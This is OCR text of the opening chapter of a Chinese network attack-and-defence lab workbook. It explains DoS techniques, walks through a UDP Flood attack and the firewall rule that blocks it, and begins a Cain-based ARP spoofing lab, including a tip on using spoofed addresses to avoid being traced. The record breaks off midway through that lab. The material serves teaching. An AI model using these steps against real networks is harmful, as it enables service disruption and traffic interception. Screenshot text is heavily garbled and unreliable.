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本 书 是 (网 络 攻击 与 防御 技术 ) 的 配套 教材 《网 络 攻击 与 防御 技术 ) 侧 重 于 理论 知识 的 讲 
fit ,而 本 书 主要 通过 具体 的 实验 ,对 涉及 到 的 一 些 关 键 技术 的 应 用 进行 训练 ,使 读者 在 
加 强 对 理论 知识 的 理解 的 同时 ,提高 网 络 攻防 的 动手 能 力 。 

本 书 (包括 主讲 教材 (网 络 攻击 与 防御 技术 》) 是 江苏 省 高 等 学 校 重 点 教材 ,从 立项 
之 初 到 最 后 成 书 , 期 间 曾 几 易 其 稿 。 本 书 在 写作 过 程 中 主要 克服 了 以 下 的 困难 : 

一 是 实验 内 容 的 确定 。 实 验 内 容 必 须要 与 理论 知识 相对 应 ,并 能 够 恰当 地 反映 理 
论 知 识 的 内 涵 和 外 延 。 由 于 每 一 章节 涉及 的 知识 点 较 多 ,而 要 做 到 实验 内 容 反 映 所 有 
的 知识 点 ,这 在 一 本 教材 的 编写 过 程 中 是 无 法 实现 的 。 为 此 ,本 书 每 章 闭 选 了 一 些 典 型 
的 实验 ,力求 能 够 反映 核心 的 内 容 。 

二 是 实验 内 容 的 组 织 。 对 于 一 个 具体 的 实验 来 说 如 何 组 织 其 内 容 , 既 要 考虑 实验 
的 可 操作 性 ,还 要 关注 知识 点 之 间 的 有 效 衔接 。 为 了 达到 这 一 目的 ,本 书 的 每 个 实验 都 
包括 预备 知识 、 实 验 目的 和 条 件 、 实 验 过 程 和 任务 与 思考 4 个 环节 ,在 突出 知识 掌握 的 
同时 ,加 强 对 能 力 的 拓展 。 

三 是 实验 环境 的 构建 。 为 了 能 够 使 每 一 位 读者 在 不 需要 依赖 第 三 方 平台 的 基础 上 
能 够 开展 每 一 个 实验 ,本 书 中 所 选择 的 实验 环境 都 可 以 由 读者 借助 互联 网 根据 实验 要 
求 自己 搭建 ,并 完成 实验 操作 。 

本 书 的 内 容 分 为 网 络 攻防 基础 实 训 、Windows 操作 系统 攻防 实 训 、Linux 操作 系统 攻防 
实 训 ,恶意 代码 攻防 实 训 、Web 服务 器 攻防 实 训 、Web 浏览 器 攻防 实 训 和 移动 互联 网 应 用 攻 
防 实 训 7 章 。 为 了 便于 教学 的 开展 ,本 书 每 一 章 的 内 容 与 (网 络 攻击 与 防御 技术 ) 一 一 对 应 。 

本 书 在 编写 过 程 中 得 到 了 许多 同事 和 同行 的 无 私 帮助 和 支持 ,在 项 目 申请 和 出 版 
过 程 中 得 到 了 清华 大 学 出 版 社 编辑 老师 的 关心 和 帮助 。 本 书 中 的 实验 内 容 由 北京 易 霖 
博信 息 技术 有 限 公司 提供 ,同时 在 编写 过 程 中 参考 了 大 量 的 文献 资料 。 其 中 ,第 1 章 到 
第 3 章 的 内 容 由 李 酸 娟 副教授 编写 ,第 4 章 和 第 5 章 由 徐 鹏 工程 师 编写 ,第 6 章 和 第 7 
章 由 王 群 教授 编写 ,同时 王 群 教授 负责 全 书 的 统 稿 工作 , 刘 家 银 和 倪 雪 莉 老师 负责 全 书 
的 校对 。 对 资料 的 直接 提供 者 以 及 文献 资料 的 贡献 者 ,在 此 一 并 表示 囊 心 的 感谢 ! 

由 于 作者 水 平 有 限 , 书 中 肯定 会 出 现 一 些 错误 和 不 足 , 敬 请 读者 提出 宝贵 意见 。 同 
时 ,本 书 的 作者 也 会 对 内 容 进行 不 断 完善 ,适时 提供 新 的 版 本 。 
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针对 《网 络 攻击 与 防御 技术 ) 第 1 章 “ 网 络 攻 防 技术 概述 "的 内 容 , 使 读者 在 对 网 络 攻 防 
基本 概念 、 基 础 知识 和 实现 方法 有 了 一 定 了 解 的 基础 上 ,通过 本 章 的 具体 介绍 ,使 读者 对 攻 
防 实 训 环 境 和 基本 的 攻防 实施 方法 有 所 认识 。 其 中 ,和 靶 机 (target drones) 原 指 军事 射击 训 
练 中 的 一 种 飞行 器 ,而 在 网 络 攻防 环境 中 泛 指 被 攻击 的 对 象 ,攻击 机 则 是 对 目标 对 象 实施 攻 
击 行为 的 计算 机 。 





1.1 Р Л: UDP Flood 拒绝 服务 攻击 与 防范 


1.1.1 预备 知识 : DoS/DDoS 


网 络 攻击 是 指 任何 非 授权 而 进入 或 试图 进入 他 人 计算 机 网 络 的 行为 ,是 入 侵 者 实现 人 
侵 目 的 所 采取 的 技术 手段 和 方法 。 这 种 行为 既 包 括 对 整个 网 络 的 攻击 ,也 包括 对 网 络 中 的 
服务 器 防火墙 .路 由 器 等 单个 节点 的 攻击 ,还 包括 对 节点 上 运行 的 某 一 个 应 用 系统 或 应 用 
软件 的 攻击 。 根 据 攻击 实现 方法 的 不 同 ,可 以 分 为 主动 攻击 和 被 动 攻击 两 种 类 型 。 

主动 攻击 是 指 攻 击 者 为 了 实现 攻击 目的 ,主动 对 需要 访问 的 信息 系统 进行 非 授权 的 访 
问 行为 。 例 如 ,通过 远程 登录 服务 器 的 TCP 25 号 端口 搜索 正在 运行 的 服务 器 信息 ,在 TCP 
连接 建立 时 通过 伪造 无 效 TP 地 址 耗 尽 目 标 主机 的 资源 等 。 主 动 攻击 的 实现 方法 较 多 ,针对 
信息 安全 的 可 用 性 ,完整 性 和 真实 性 ,一 般 可 以 分 为 中 断 、 算 改 和 伪造 3 种 类 型 。 拒 绝 服务 
攻击 是 最 常见 的 中 断 攻击 方式 , 除 此 之 外 ,针对 身份 识别 .访问 控制 .审计 跟踪 等 应 用 的 攻击 
也 属于 中 断 类 型 。 

DoS(Denial of Service ,拒绝 服务 攻击 ) 利 用 目标 系统 网 络 服务 功能 缺陷 或 直接 消耗 其 
系统 资源 ,使 得 该 目标 系统 无 法 提供 正常 的 服务 。DDoS(Distributed Denial of Service, 分 
布 式 拒绝 服务 攻击 ) 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 , 它 利 用 了 互联 网 
的 分 布 式 特征 ,将 分 散 的 攻击 源 集 中 后 向 目标 主机 同时 发 起 攻击 。 单 一 的 DoS 攻击 一 般 采 
用 一 对 一 的 方式 , 当 攻 击 目 标 主机 的 CPU 利用 率 升 高 .内 存 减 小 或 网 络 带 宽 变 小 时 ,可 能 
发 生 了 DoS/DDoS 攻击 。 

随 着 计算 机 与 网 络 技 术 的 发 展 ,计算 机 的 处 理 能 力 迅 速 增长 ,内 存 空间 明显 增加 ,同时 
也 出 现 了 万 兆 级 别 甚 至 更 高 带宽 的 网 络 ,这 使 得 DoS 攻击 的 困难 程度 增 大 ,目标 对 象 对 恶 
意 攻击 数据 包 的 “消化 能 力 ” 不 断 加 强 。 例 如 ,攻击 软件 每 秒 可 以 发 送 3000 个 攻击 包 , 但 被 
攻击 对 象 的 主机 与 网 络 带 宽 每 秒 可 以 处 理 10 000 个 攻击 包 , 在 这 种 情况 下 ,即使 发 生 了 攻 
击 , 也 不 会 产生 什么 效果 。 此 时 ,分布 式 拒绝 服务 攻击 (DDoS) 便 发 挥 了 其 优势 。 

读者 在 理解 了 Dos 攻击 原理 后 ,对 DDoS 攻击 的 原理 便 很 容易 掌握 。 对 于 某 一 被 攻 
主机 说 ,如 果 一 台 攻 击 机 实施 攻击 时 无 法 发 挥 作用 ,那么 用 10 台 、100 台 甚 至 是 更 多 的 攻 
机 呢 ? DDoS 就 是 利用 更 多 的 倪 介 机 发 起 进攻 ,以 比 从 前 更 大 的 规模 进攻 受害 者 。 
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从 防范 的 角度 看 , 随 着 服务 器 端 处 理 任务 的 日 益 复 杂 及 网 站 访问 量 的 迅速 增长 ,服务 器 
性 能 的 优化 也 成 了 非常 迫切 的 任务 。 在 优化 之 前 ,最 好 能 够 测试 一 下 不 同 条 件 下 服务 器 的 
性 能 表现 。 

常见 DoS 拒绝 服务 攻击 方式 包括 以 下 5 种 。 

1. Smurf 攻击 


Smurf 攻击 结合 了 IP 欺骗 和 ICMP 回复 方法 ,通过 产生 大 量 ICMP 应 答 数 据 包 ,导致 
被 攻击 主机 网 络 发 生 拥 堵 。Smnurf 的 攻击 过 程 为 : 攻击 者 首先 确定 一 个 与 互联 网 相 联 的 同 
时 拥有 大 量 主机 的 网 络 ( 某 一 IP 网 段 ), 然 后 向 该 网 络 的 广播 地 址 (如 201. 10. 129. 255) 发 
送 一 个 欺骗 性 Ping 分 组 (echo 请 求 分 组 ) ,这 个 目标 网 络 ( 如 201. 10. 129. 0) 被 称 为 反弹 站 
点 ,而 欺骗 性 Ping 分 组 的 源 地 址 就 是 攻击 者 已 确定 的 被 攻击 系统 。 被 确定 的 IP 网 段 中 的 
所 有 主机 在 收 到 Ping 分 组 后 ,都 会 向 欺骗 性 Ping 分 组 的 IP 地 址 (被 攻击 系统 ) 发 送 echo 
响应 报 文 。 如 果 目 标 网 络 拥有 较 大 的 IP 地 址 段 ,就 会 产生 大 量 的 echo 响应 报 文 ,被 攻击 的 
目标 系统 很 快 就 会 被 大 量 的 echo 响应 报 文 吞没 ,从 而 引起 DDoS 攻击 。 

2. Land 攻击 

当 客户 端 尝试 与 服务 器 建立 TCP 连接 时 ,正常 情况 下 客户 端 与 服务 器 端 需要 交换 一 系 
列 信息 。 

CD 客户 端 通过 发 送 SYN 同步 报 文 到 服务 器 ,请 求 建立 连接 。 

(2) 服务 器 响应 客户 端 SYN-ACK ,以 响应 АСК 请 求 。 

(3) 客户 端 应 答 ACK, TCP 会 话 连接 建立 。 

以 上 过 程 , 即 TCP 三 次 握手 , 它 是 每 个 TCP 连接 建立 时 首先 要 完成 的 操作 。 

在 Land 攻击 中 ,攻击 者 利用 一 个 特殊 构造 的 SYN 报 文 ,该 报 文 的 源 地 址 和 目标 地 址 
都 被 设置 成 被 攻击 对 象 的 地 址 ,然后 采用 该 SYN 报 文 进行 攻击 。Land 攻击 将 导致 被 攻击 
对 象 向 自己 的 地 址 发 送 SYN-ACK 报 文 , 结 果 这 个 地 址 又 发 回 ACK 报 文 并 创建 一 个 空 连 
接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 ,以 此 消耗 资源 。 

3. Teardrop 攻击 

Teardrop 攻击 是 利用 UDP 的 错误 分 片 数 据 包 实现 攻击 过 程 。Teardrop 攻击 的 实现 原 
理 为 : 攻击 者 向 被 攻击 对 象 发 送 多 个 经 过 事先 构造 的 分 片 IP 数据 报 ,每 个 经 分 片 的 IP Ж 
据 报 中 包含 该 分 片 属于 哪个 原始 数据 报 , 以 及 在 原始 数据 报 中 的 位 置 等 信息 。 由 于 互联 网 
中 的 路 由 器 对 IP 分 片 不 会 进行 重组 ,被 分 片 后 IP 数据 的 重组 在 目标 主机 上 完成 。 攻 击 者 
如 果 通 过 精心 设计 ,将 一 个 原始 IP 数据 报 分 片 成 多 个 IP 分 片 ,而 且 IP 4 r Z B] £f # E ë 
的 “段位 移 ”( 假 设 原始 数据 报 中 的 第 3 个 IP 分 片 的 “段位 移 ” 小 于 第 2 个 IP 分 片 结束 的 “ 段 
位 移 ”, 而 且 加 上 第 3 个 IP 分 片 中 的 数据 ,也 未 超过 第 2 个 IP 分 片 的 尾部 ,这 就 在 第 2 个 TP 
分 片 与 第 3 个 IP 分 片 之 间 产 生 了 重 倒 ), 这 时 , 当 某 些 操 作 系 统 收 到 含有 重生 “段位 移 ” 的 
IP 分 片 时 将 会 出 现 系统 崩溃 、 重 启 等 现象 。 

4. Ping of Death 攻击 


Ping of Death 攻击 即 通常 所 讲 的 “死亡 之 Ping”。 这 种 攻击 利用 绝 大 多 数 网 络 设备 和 
系统 所 支持 的 网 络 连通 性 测试 功能 ,利用 Ping 工具 提供 的 可 动态 调整 ICMP 报 文大 小 的 特 
征 ,攻击 者 向 被 攻击 对 象 发 送 大 于 65 536B 的 ICMP 报 文 ,使 被 攻击 对 象 的 操作 系统 崩溃 。 
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通常 情况 下 ,Ping 工具 不 可 以 发 送 大 于 65 536B 的 ICMP 报 文 , 但 可 以 把 该 ICMP 报 文 
分 割 成 多 个 IP 分 片 ,然后 在 目标 主机 上 重组 。 在 分 片 重组 过 程 中 导致 被 攻击 目标 缓冲 区 溢 


出 ,引起 拒绝 服务 攻击 。 


5. SYN Flood 攻击 
SYN Flood 攻击 利用 TCP 三 次 握手 实现 ,攻击 者 使 用 无 效 IP 地 址 向 被 攻击 主机 发 送 
大 量 伪造 源 地 址 的 TCP SYN 报 文 ,被 攻击 主机 在 收 到 该 TCP SYN 报 文 后 ,会 分 配 必要 的 
资源 ,然后 向 源 地 址 返回 SYN-ACK 报 文 , 并 等 待 源 主机 返回 ACK 报 文 。 如 果 伪 造 的 源 地 


址 主机 处 于 活跃 状态 ,将 会 返 











回 一 个 RST 报 文 直接 关闭 连接 ,但 大 部 分 伪造 源 地 址 是 非 活 


跃 的 ,这 种 情况 下 源 地 址 永远 无 法 返回 ACK 报 文 ,被 攻击 主机 继续 发 送 SYN-ACK 报 文 ， 
并 将 半 开 连接 放 入 端口 的 积压 队列 中 ,虽然 一 般 的 主机 都 有 超时 机 制 和 默认 的 重 传 次 数 ,但 
是 由 于 端口 半 连 接 队 列 的 长 度 有 限 ,如 果 不 断 地 向 被 攻击 主机 发 送 大 量 的 TCP SYN 报 文 ， 
半 开 连接 队列 就 会 很 快 填 满 ,被 攻击 主机 也 就 拒绝 新 的 连接 ,导致 该 端口 无 法 响应 其 他 客户 

















端 进 行 的 正常 连接 请 求 , 最 终 使 被 攻击 主机 被 拒绝 服务 。 
1.1.2 实验 目的 和 条 件 


1. 实验 目的 


通过 本 实验 ,使 读者 在 学 习 DoS/ DDoS 攻击 实现 原理 和 过 程 的 基础 上 ,结合 防火 墙 应 


用 ,掌握 相关 的 防御 方法 。 


2. 实验 条 件 


本 实验 所 需要 的 软 硬 件 清 单 如 表 1-1 所 示 。 


X 1-1. UDP Flood 拒绝 服务 攻击 与 防范 实验 清单 





























类 型 序 号 软 硬 件 要 求 规 格 
数量 16 

攻击 机 2 操作 系统 版 本 Windows XP 以 上 
3 软件 版 本 UDP Flood 2.0 
1 数量 无 

ж š 操作 系统 版 本 无 
3 软件 版 本 天 网 防火 墙 3.0 
1.1.3 实验 过 程 


1. 使 用 UDP Flood 程序 向 靶 机 服务 器 发 送 UDP е 


步骤 1: 获取 本 实验 所 需要 的 工具 UDP Flood, 运 行 后 打开 如 图 1-1 所 示 的 操作 界面 。 


(D IP/hostname: 输入 实验 中 靶 机 服务 器 使 用 的 IP 地 址 。 


© Рогі: 输入 端口 号 ,本 实验 使 用 默认 端口 445。 


@ Max duration(secs): 输入 一 个 最 大 的 发 包 量 , 如 600。 


@ Speed: 选择 网 络 连 接 方式 ,本 实验 为 局 域 网 ,所 以 选择 LAN 选项 。 
之 后 , 单 击 Go 按钮 ,开始 发 包 。 
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图 1-1 UDP Flood 工具 操作 界面 


步骤 2. 登录 防火 墙 , 单 击 “ 日 志 ” 标 签 ,在 打开 的 如 图 1-2 所 示 的 防火 墙 日 志 列 表 中 可 
以 查看 到 大 量 的 来 自 同一 个 IP 地 址 ( 即 攻击 机 的 IP 地 址 ) 的 UDP 包 。 其 中 ,本 机 端口 是 
445, 并 且 该 UDP 包 是 允许 通行 的 。 





图 1-2 防火 墙 日 志 信息 


步骤 3: 在 攻击 机 上 单 击 UDP Flood 程序 界面 上 的 Stop 按钮 ,停止 发 包 , 但 注意 不 要 
关闭 该 程序 。 

2. 设置 防火 墙 规则 禁止 UDP 包 通 过 

步骤 1. 单 击 防火 墙 的 “ 自 定义 IP 规则 ”管理 标签 ,打开 如 图 1-3 所 示 的 IP 规则 管理 
界面 。 

步骤 2: 单 击 “增加 规则 ”图 标 ,打开 如 图 1-4 所 示 的 “修改 IP 规则 ”操作 界面 。 

CD 名 称 : 输入 一 个 名 称 ,如 deny udp。 
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图 1-3 防火 墙 的 IP 规则 管理 界面 





图 1-4 “修改 IP 规则 ?操作 界面 


O 数据 包 方 向 : 选择 “接受 "选项 即 可 。 

© 对 方 了 地 址 : 选择 “指定 地 址 ”选项 ,然后 在 “地 址 ”后面 输 入 刚才 在 日 志 中 看 到 的 
IP 地 址 。 

CD 数据 包 协 议 类 型 : 选择 UDP 选项 。 

© 当 满 足 上 面条 件 时 : 选择 “拦截 "选项 ,并 选中 “记录 ”和 “警告 " 复 选 框 。 
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当 以 上 参数 和 选项 设置 好 后 , 单 击 “ 确 定 ” 按 钮 ,返回 规则 管理 界面 。 

步骤 3: 在 规则 管理 界面 中 ,选择 在 步骤 2 中 添加 的 规则 ,然后 单 击 该 规则 将 其 图 标 上 
移 , 使 其 处 于 UDP 协议 规则 的 最 上 面 , 并 进行 保存 。 

步骤 4: 返回 攻击 机 ,进入 UDP Flood 程序 界面 , 单 击 Go 按钮 ,重新 开始 发 包 。 

步骤 5: 返回 防火 墙 操作 界面 ,再 次 打开 防火 墙 日 志 。 此 时 会 发 现 ,日 志 中 记录 的 该 IP 
发 送 的 UDP 状态 显示 为 “该 包 被 拦截 ”, 如 图 1-5 所 示 。 





图 1-5 防火 墙 日 志 中 显示 已 被 拦截 的 UDP 数据 包 


1.1.4 任务 与 思考 


针对 DDoS 攻击 ,目前 基于 目标 计算 机 系统 的 防范 方法 主要 有 网 关 防范 .路 由 器 防范 和 
主机 防范 3 种 类 型 。 在 这 3 种 类 型 中 ,网 关 防 范 较为 常见 ,而 且 应 用 效果 较 好 。 

网 关 防 范 是 指 利用 专门 技术 和 设备 在 网 关上 防范 DDoS 攻击 , 它 主要 采用 的 技术 有 
SYN Cookie 方法 、 基 于 IP 访问 记录 的 HIP 方法 和 客户 计算 瓶颈 方法 等 。 

(1) SYN Cookie, SYN Cookie 对 ТСР 服务 器 端的 三 次 握手 做 了 一 些 修改 ,是 专门 用 
来 防范 SYN Flood 攻击 的 一 种 手段 。SYN Cookie 的 工作 原理 为 : 在 TCP 服务 器 接收 到 
TCP SYN 包 并 返回 TCP SYN+ ACK 包 时 ,不 是 分 配 一 个 专门 的 数据 区 ,而 是 根据 这 个 
SYN 包 计 算出 一 个 Cookie 值 , 且 这 个 Cookie 作为 将 要 返回 的 SYN АСК 包 的 初始 序列 号 。 
例如 , 当 客 户 端 返回 一 个 ACK 包 时 ,根据 数据 包头 部 信息 计算 Cookie, 与 返回 的 确认 序列 
号 (初始 序列 号 十 1) 进 行 对 比 , 如 果 相 同 , 则 是 一 个 正常 连接 ,然后 分 配 资源 ,建立 连接 。 

(2) 基于 IP 访问 的 HIP 方法 。HIP(Host Identity Protocol, 主机 标识 协议 ) 方 法 采用 
行为 统计 方法 区 分 攻击 包 和 正常 包 , 对 所 有 访问 IP 建立 信任 级 别 。 当 发 生 DDoS 攻击 时 ， 
信任 级 别 高 的 IP 有 优先 访问 权 , 从 而 解决 了 识别 问题 。 

(3) 客户 计算 瓶颈 方法 。 客 户 计算 瓶颈 方法 是 指 将 访问 时 的 资源 瓶颈 从 服务 器 端 转移 
到 客户 端 ,从 而 大 大 提升 DDoS 的 代价 。 客 户 计 算 瓶 颈 方法 协议 复杂 ,需要 对 现 有 操作 系统 
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和 网 络 结构 进行 较 大 的 变动 ,这 也 在 很 大 程度 上 影响 了 该 方法 的 可 操作 性 。 
另外 ,有 关 路 由 器 防范 和 主机 防范 方面 ,读者 可 参阅 相关 文献 。 


1.2 算 改 攻击 : ARP 欺骗 攻击 
1.2.1 预备 知识 : ARP 欺骗 攻击 


1. ARP 协议 

ARP(Address Resolution Protocol, 地 址 解析 协议 ) 用 于 将 计算 机 的 网 络 地 址 (32 位 IP 
地 址 ) 转 化 为 物理 地 址 (48 位 МАСЛЕ). АКР 协议 是 属于 数据 链 路 层 的 协议 ,在 以 太 网 
中 的 数据 帧 从 一 台 主 机 到 达 同 一 网 段 内 的 另 一 台 主 机 是 根据 以 太 网 地 址 (硬件 地 址 ) 确 定 接 


口 的 ,而 不 是 根据 IP 地 址 。 除 点 对 点 的 连接 之 外 ,内 核 (如 驱动 ) 必 须知 道 目 的 端的 硬件 地 
址 才能 发 送 数 据 。 
2. ARP 攻击 原理 


由 于 ARP 协议 在 设计 中 存在 主动 发 送 ARP 报 文 的 漏洞 ,使 得 主机 可 以 发 送 虚假 的 
ARP 请 求 报 文 或 响应 报 文 , 报 文中 的 源 IP 地 址 和 源 MAC 地 址 均 可 以 进行 伪造 。 在 局 域 
网 中 , 既 可 以 伪造 成 某 一 台 主 机 (如 服务 器 ) 的 IP 地 址 和 MAC 地 址 的 组 合 , 也 可 以 伪造 成 
网 关 的 IP 地 址 和 MAC 地 址 的 组 合 ,等 等 。 这 种 组 合 可 以 根据 攻击 者 的 意图 进行 任意 拱 
配 ,而 现 有 的 局 域 网 中 却 没有 相应 的 机 制 和 协议 防止 这 种 伪造 行为 。 近 几 年 来 ,局 域 网 中 的 
ARP 欺骗 已 经 沁 滥 成 灾 , 几乎 没有 一 个 局 域 网 未 遭遇 过 АКР 欺骗 的 侵害 。 


1.2.2 实验 目的 和 条 件 





1. 实验 目的 

通过 该 实验 ,使 读者 对 IP 网 络 中 某 一 网 段 主机 之 间 的 通信 有 更 进一步 的 认识 ,尤其 对 
ARP 协议 自身 的 安全 性 有 更 深入 的 了 解 。 在 此 基础 上 ,进一步 掌握 ARP 欺骗 攻击 的 防范 
方法 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 所 需要 的 软 硬 件 清单 如 表 1-2 所 示 。 


表 1-2 ARP 欺骗 攻击 与 防范 实验 清单 























类 型 序 5 软 硬 件 要 求 я 格 
1 数量 18 
攻击 机 2 操作 系统 版 本 Windows XP 以 上 
3 软件 版 本 Cain 
1 数量 1 台 
юз 2 操作 系统 版 本 Windows XP 以 上 
3 软件 版 本 无 











8 网 络 攻 击 与 防御 实 训 





1.2.3 实验 过 程 


步骤 1: 登录 靶 机 获取 本 机 МАС 地 址 。 正 常 登录 鄞 机 后 ,选择 “运行 ”命令 ,在 打开 的 
对 话 框 中 输入 “cmd” 命 令 , 打 开 命 令 提 示 符 窗口 。 在 窗口 中 分 别 输入 “ipconfig” 和 “arp -a” 
命令 ,在 打开 的 对 话 框 中 显示 了 本 机 的 IP 地 址 `MAC 地 址 等 网 络 配置 信息 ,如 图 1-6 所 示 。 








ayna - < < : 192.168.1.187 
Subnet Mask . . - - < . : 255.255.255.0 
Default Gateway . + + + : 192.168.1.1 


Adninistratoryarp -a 


[SE 

Internet fiddre: ical Addr Type 

192.168.1.1 dynanic 
dynanic 
dynanic 
dynanic 
dynanic 
dynanic 
dynanic 


C:\Documents and SettingsNhdninistrator》 ~ 
图 1-6 ”运行 “ipconfig” 和 “arp -a” 命 令 后 的 显示 结果 


步骤 2: 登录 攻击 机 ,运行 Cain 工具 (需要 事先 安装 ) ,打开 如 图 1-7 所 示 的 Cain 工具 操 
作 窗 口 。 








TEE 
— 9 @ h Ë 8 |+ Q ъв. )EmEg Pd m @ %@ 2 Ө? | ñ 
B mesas [er Г а [a] crecer ГИ Г А CC EEC 


Cachad Passwords 
Bf Protected Storage 
@ LSA Secrets 
QU Wireless Passvords 
@ т раног 
ES Windows Neil Passwords 
Q Dialup Passwords 
5 Edit Boxes 


fn Enterprise Manager 

























Press the + button on the toolbar to dump the Protected Storage 


{# Credential Manager 





Protected Storage 
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DM 1512 


图 1-7 Cain 工具 操作 窗口 
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步骤 3: 单 击 Configure 菜单 项 ,在 打开 的 对 话 框 中 选取 Sniffer 选项 卡 ,打开 如 图 1-8 
所 示 的 对 话 框 ,在 其 中 选择 本 机 的 网 卡 , 并 进行 绑 定 ,然后 单 击 “ 确 定 ” 按 钮 ,返回 Cain 工具 
操作 窗口 。 








iguration Dialog 





Filters and ports | ЮР Fields | Traceroute 
(È, Cached Passwords Certificate Spoofing | Certificates Collector 
Protected Storage Sniffer | APR (Arp Poison Routing ) | Challenge Spoofing 
LSA Secrets 
S" Wireless Passwords 
Ё IET Passwords 192. 168.1. 186 255. 255. 255.1 
Ij] Windows Mail Passwords ig \Devi ce\NPF_Generi 0.0.0.0 0.0.0.0 
Dial ords 





Enter 
$9 Credential Manager © 
Жіррсар Version 
4.1.0. 2001 








WARNING 111 Only ethernet adapters supported 
Options 


[ms Netvork Adapter 
f 


[ Start Sniffer on sl [7 Don't use Promiscuous mode 
T^ Start APR on star- 


天 Protected Storage 
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图 1-8 选择 本 机 网 卡 并 进行 绑 定 


说 明 : 如 果 在 一 台 物 理 机 上 安装 了 虚拟 机 ,在 图 1-8 所 示 的 对 话 框 中 将 会 存在 多 个 网 
卡 ( 有 些 物 理 机 本 身 安 装 有 多 块 网 卡 )。 这 时 ,就 需要 选取 本 机 的 网 卡 ,并 为 其 绑 定 IP 地 址 。 
其 中 ,网 卡 的 选择 根据 所 要 嗅 探 的 TP 地 址 的 范围 决定 。 

步骤 4: 在 图 1-8 所 示 的 对 话 框 中 选取 Filters and ports 选项 卡 ,打开 如 图 1-9 所 示 的 
对 话 框 ,在 其 中 选取 嗅 探 的 协议 类 型 和 对 应 的 端口 号 。 

步骤 5: 在 图 1-8 所 示 的 对 话 框 中 选取 APR(Arp Poison Routing) 选 项 卡 , 打 开 如 图 1-10 
所 示 的 对 话 框 ,在 其 中 设置 在 嗅 探 时 所 使 用 的 本 机 TP 地 址 和 MAC 地 址 。 这 里 既 可 以 选择 
使 用 本 机 的 真实 IP 地 址 和 MAC 地 址 (Use Real IP and MAC address) ,也 可 以 选择 使 用 伪 
装 的 IP 地址 和 MAC 地 址 (Use Spoofed IP and MAC address)。 如 果 选 择 使 用 伪装 的 IP 
地 址 和 MAC 地 址 ,可 以 填写 事先 设 定 的 IP 地 址 及 MAC 地 址 ,这样 ,在 之 后 的 欺骗 中 即使 
被 发 现 , 也 难以 追溯 到 真实 主机 。 设 置 好 相应 参数 后 , 单 击 “ 确 定 ”按钮 ,返回 Cain 主 窗口 。 

步骤 6: 单 击 Start/Stop Sniffer 按钮 ,再 单 击 Add to List 按钮 ,在 打开 的 对 话 框 中 设 
置 要 嗅 探 的 目标 对 象 ,如 图 1-11 所 示 。 本 实验 选择 对 整个 局 域 网 进行 嗅 探 ,所 以 选中 АП 
hosts in my subnet 单 选 按钮 ñ OK 按钮 后 返回 Cain 主 窗口 ,在 Cain 主 窗口 将 显示 嗅 
探 过 程 的 进度 ,如 图 1-12 Brzn 
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Certificate Spoofing | Certificates Collector 
[D Cached Passwords Sniffer | АРЕ ( Arp Poison Routing ) | Challenge Spoofing 
Filters and ports | ТТР Pielas | Traceroute 


LSA Secrets 
£i Wireless Passwords 
@ IET Passwords 

j] Windows Mail Passwords 
š Dialup Passwords 
E= Edit Boxes 

Enterprise Manager 

{# Credential Manager 
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图 1-9 选取 嗅 探 的 协议 类 型 和 端口 号 







View Configure Tools 


dem ER + 


M 


Certificate Spoofing | ^ Certificates Collector 
Cached Passwords Filters end ports | WITP Fields | Traceroute 











Bl. Protected Storage Sniffer APR (Arp Poison Routing ) | Challenge Spoofing 
Bl ІЗА Secrets 
ig Wireless Passwords Spoofing Options 
@ тт Passwords (€ Use Real IP and MAC address: 
Windows Mail Passwords (C Vse Spoofed IP and МАС address 
Dialup Passwords 
[e Edit Boxes mj ° E 


Enterprise Manager 
Credential Manager Pre-Poisoning 
[V Pre-Poison ARP caches (cr 


Poisoning- 
Poison remote ARP caches 


G Use ARP Reply Packets 
(C Use ARP Request Packets (Моге Network Traffic) 














Protected Storage 





fo o® 15:19 


1-10 配置 APR 选项 





11 
























192. 168. 1. 126 
192.168.1.133 — 1CB09442ABCC 
192.168.1.1 18879817040С 
192.188.1.102 — A0F450F9157D 










- Proniscuous Mode Scanner 

T^ ARP Test (Broadcast 31-bà) 
厂 ARP Test (Broadcast 16i) 
T^ ARP Test [Broadcast Sbit) 

T^ ARP Test (Group bi] 

Г ARP Test [Mulicast group 0] 
T^ ARP Test Mulicast group 1) 
T7 ARP Тез [Mulicast group 3) 
Г Al Tests 





图 1-11 选取 嗅 探 对 象 














4206DFS4F93 
1CHO9442ABCC 
188T961T04CC 
ADF450F9157D 
БАЕВЕСБӘЮ2ТТ TP-LINK TECHNOLOGIES CO. 
TAEA3AABAIZA TP-LINK Technologies Co. 
C83A351E53C0 de Ten Co La 
Eo0scs3003F8 Ф 
oo23cn3Br2c4 scanning 
0025906783F8 
ООЕООРСВ2ВӘ! 
887024298548 
ECAB652D426C 
ЕСА$6В214462 
00238BF1FTB9 
00265EET628E 
O01PE210F49A 
ECAB652D4467 
118 002618010809 ASUSTek COMPUTER INC 

119 ЕСАЗБЕ20399А 

100 60FB69TFAACP Quanta computer Inc. 

123 。 00251167CE54 ELITEGROUP COMPUTER SIS. 

131 002154858479 Mevlett Packard 

136 ECA86B82D4461 

180 00040088878 REALTEK SEMICONDUCTOR C. 

1T 6CTF2F91A4B6 

178 0021885АІЗОЕ Universal Global Scient. R 
200 0010C680535C Universal Global Scient. 
































NAC addres 





Pesseords [ УР 





图 1-12 显示 嗅 探 进度 
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步骤 7: 单 击 Cain 主 窗口 下 端的 APR 标签 ,在 出 现 的 对 话 框 中 单 击 Add to list 按钮 ， 
在 选项 框 中 选择 进行 ARP 欺骗 的 地 址 ,打开 如 图 1-13 所 示 的 对 话 框 。 在 左 侧 列表 中 选择 
被 欺骗 的 主机 ,再 在 右 侧 选 择 合适 的 主机 (或 网 关 )。 在 该 实验 中 ,首先 在 左 侧 列表 中 选择 革 
机 的 IP 地 址 ,然后 在 右 侧 列表 中 将 会 出 现 其 他 IP 地 址 ,如 果 在 右 侧 选择 网 关 192. 168. 1. 1. 
这 样 就 可 以 截获 所 有 从 靶 机 发 出 到 其 他 网 络 的 数据 包 。 


Tile View Configure Tools Help 
|a o ko y s5ummHEagO.ScO6??n 
[E Decoders [P neon [Mp Sni tter [7 crecer [Q recens [ER cr TY гае [E 9e | 
СӘ APR Status. IP address MAC address Packet... | < Pac... | МАС address 
GJ Aert 
S, APR-DNS 
EN rssi 00) 
B АРЕ-ИТТРЅ (D) 
Bj APR-ProxyMTTES (D) 
ЧЁ APR-RDP (0) 
